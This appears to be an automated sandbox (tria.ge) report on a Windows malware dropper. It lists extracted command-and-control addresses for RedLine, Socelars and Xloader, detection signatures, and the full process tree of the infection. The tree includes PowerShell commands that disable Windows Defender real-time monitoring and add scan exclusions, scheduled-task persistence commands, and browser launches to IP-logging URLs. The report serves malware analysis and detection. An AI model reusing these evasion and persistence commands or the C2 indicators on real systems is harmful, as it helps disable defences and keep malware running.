Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
97s -
max time network
1167s -
platform
windows11_x64 -
resource
win11 -
submitted
08/11/2021, 16:12
General
-
Target
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
redline
Botnet
ChrisNEW
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media25
C2
91.121.67.60:23325
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 8 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Xloader Payload 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 33 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 9 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
autoit_exe 3 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
-
Checks processor information in registry 2 TTPs 56 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 17 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 39 IoCs
-
Suspicious use of SendNotifyMessage 38 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe"C:\Users\Admin\AppData\Local\Temp\cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01d702368dbba.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01d702368dbba.exeTue01d702368dbba.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HE31D.tmp\Tue01d702368dbba.tmp"C:\Users\Admin\AppData\Local\Temp\is-HE31D.tmp\Tue01d702368dbba.tmp" /SL5="$20164,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01d702368dbba.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01d702368dbba.exe"C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01d702368dbba.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FGQHL.tmp\Tue01d702368dbba.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGQHL.tmp\Tue01d702368dbba.tmp" /SL5="$30210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01d702368dbba.exe" /SILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01994ec7a792fea9.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01994ec7a792fea9.exeTue01994ec7a792fea9.exe6⤵
- Executes dropped EXE
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'8⤵
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 2409⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com8⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue018f791563585c0f9.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue018f791563585c0f9.exeTue018f791563585c0f9.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\msd56LegiJcpSW5Qshcgps2a.exe"C:\Users\Admin\Pictures\Adobe Films\msd56LegiJcpSW5Qshcgps2a.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\eeqz_unejFCeAU0KaIsRC7SI.exe"C:\Users\Admin\Pictures\Adobe Films\eeqz_unejFCeAU0KaIsRC7SI.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lBcUZ1CkjIsRxo2q0wHsg_kl.exe"C:\Users\Admin\Pictures\Adobe Films\lBcUZ1CkjIsRxo2q0wHsg_kl.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\PqKRE3hL8vp0kr_sy1mJeWdP.exe"C:\Users\Admin\Pictures\Adobe Films\PqKRE3hL8vp0kr_sy1mJeWdP.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cGRxPW4fmZTC8sVr_TJdyu1d.exe"C:\Users\Admin\Pictures\Adobe Films\cGRxPW4fmZTC8sVr_TJdyu1d.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\Yz2QhNybWM57ajoxzA0zSeYd.exe"C:\Users\Admin\Pictures\Adobe Films\Yz2QhNybWM57ajoxzA0zSeYd.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 2808⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TEMRIQNyOZtDBfTDon0xyWiE.exe"C:\Users\Admin\Pictures\Adobe Films\TEMRIQNyOZtDBfTDon0xyWiE.exe"7⤵
-
C:\Users\Admin\Documents\0ztj4EoJoU7Xa9Q43SsYopxZ.exe"C:\Users\Admin\Documents\0ztj4EoJoU7Xa9Q43SsYopxZ.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\1QpyE4lTnyD__g0tJtpbXhJX.exe"C:\Users\Admin\Pictures\Adobe Films\1QpyE4lTnyD__g0tJtpbXhJX.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ETWmZ2wCF2ieQ2CQGOuy4Rum.exe"C:\Users\Admin\Pictures\Adobe Films\ETWmZ2wCF2ieQ2CQGOuy4Rum.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 30010⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Mc1RITazx6lDE6y8mRkHgJUo.exe"C:\Users\Admin\Pictures\Adobe Films\Mc1RITazx6lDE6y8mRkHgJUo.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 28010⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nD1cN0yMOl5sUoUlh7vClYJd.exe"C:\Users\Admin\Pictures\Adobe Films\nD1cN0yMOl5sUoUlh7vClYJd.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 182410⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ljbyAN5X_o9FG4oCn55ahc2J.exe"C:\Users\Admin\Pictures\Adobe Films\ljbyAN5X_o9FG4oCn55ahc2J.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\ljbyAN5X_o9FG4oCn55ahc2J.exe"C:\Users\Admin\Pictures\Adobe Films\ljbyAN5X_o9FG4oCn55ahc2J.exe" -u10⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uhPtAUvPm6y7qCrfuC77lVFT.exe"C:\Users\Admin\Pictures\Adobe Films\uhPtAUvPm6y7qCrfuC77lVFT.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Io86yyqjQ5rP21HmFeJTjrUV.exe"C:\Users\Admin\Pictures\Adobe Films\Io86yyqjQ5rP21HmFeJTjrUV.exe"9⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0133c29150b.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0133c29150b.exeTue0133c29150b.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c451610f4a.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01c451610f4a.exeTue01c451610f4a.exe6⤵
- Executes dropped EXE
-
C:\Users\Public\run.exeC:\Users\Public\run.exe7⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 2848⤵
- Program crash
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji78⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffcb98646f8,0x7ffcb9864708,0x7ffcb98647189⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:39⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,17478201147214637808,4589298844617353953,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:89⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue010769fc7f9829.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue010769fc7f9829.exeTue010769fc7f9829.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue017abac33187.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue017abac33187.exeTue017abac33187.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue017abac33187.exeC:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue017abac33187.exe7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1kYWa78⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcb98646f8,0x7ffcb9864708,0x7ffcb98647189⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0138d4026db6d813e.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0138d4026db6d813e.exeTue0138d4026db6d813e.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue018bc5c5a0a3d4.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue018bc5c5a0a3d4.exeTue018bc5c5a0a3d4.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01e8898e0d1fce4.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01e8898e0d1fce4.exeTue01e8898e0d1fce4.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01bba8b80fa4.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01bba8b80fa4.exeTue01bba8b80fa4.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0195119235.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0195119235.exeTue0195119235.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0195119235.exe"C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0195119235.exe" -u7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01bf08f313b912.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01bf08f313b912.exeTue01bf08f313b912.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 13887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01de2411919659f09.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01de2411919659f09.exeTue01de2411919659f09.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01de2411919659f09.exeC:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01de2411919659f09.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 1648⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0105f10596.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0105f10596.exeTue0105f10596.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\HDEEbhe9r_UfhcufDq88Hyi8.exe"C:\Users\Admin\Pictures\Adobe Films\HDEEbhe9r_UfhcufDq88Hyi8.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7juc60EM6TSuPAeFW4N3RhHg.exe"C:\Users\Admin\Pictures\Adobe Films\7juc60EM6TSuPAeFW4N3RhHg.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\sdK4dl2qXFtc8RgDzRuRQ6fX.exe"C:\Users\Admin\Pictures\Adobe Films\sdK4dl2qXFtc8RgDzRuRQ6fX.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\1qgboQzRtCb43OZGZ2wNfcyH.exe"C:\Users\Admin\Pictures\Adobe Films\1qgboQzRtCb43OZGZ2wNfcyH.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\vfQ0XoF0KYzAJOIjGYERObQP.exe"C:\Users\Admin\Pictures\Adobe Films\vfQ0XoF0KYzAJOIjGYERObQP.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\LMFO6QWFvcJ9vOnHGeA6QLZ1.exe"C:\Users\Admin\Pictures\Adobe Films\LMFO6QWFvcJ9vOnHGeA6QLZ1.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\kdiWiazc_8jZDwRS192tba3G.exe"C:\Users\Admin\Pictures\Adobe Films\kdiWiazc_8jZDwRS192tba3G.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\idZgPrMxC2jxKkgfX17SY602.exe"C:\Users\Admin\Pictures\Adobe Films\idZgPrMxC2jxKkgfX17SY602.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\P6VHvUtX5pqmixo220CDs1f7.exe"C:\Users\Admin\Pictures\Adobe Films\P6VHvUtX5pqmixo220CDs1f7.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\r_wJXHj3CQpsnE6p_uw85C_N.exe"C:\Users\Admin\Pictures\Adobe Films\r_wJXHj3CQpsnE6p_uw85C_N.exe"7⤵
-
-
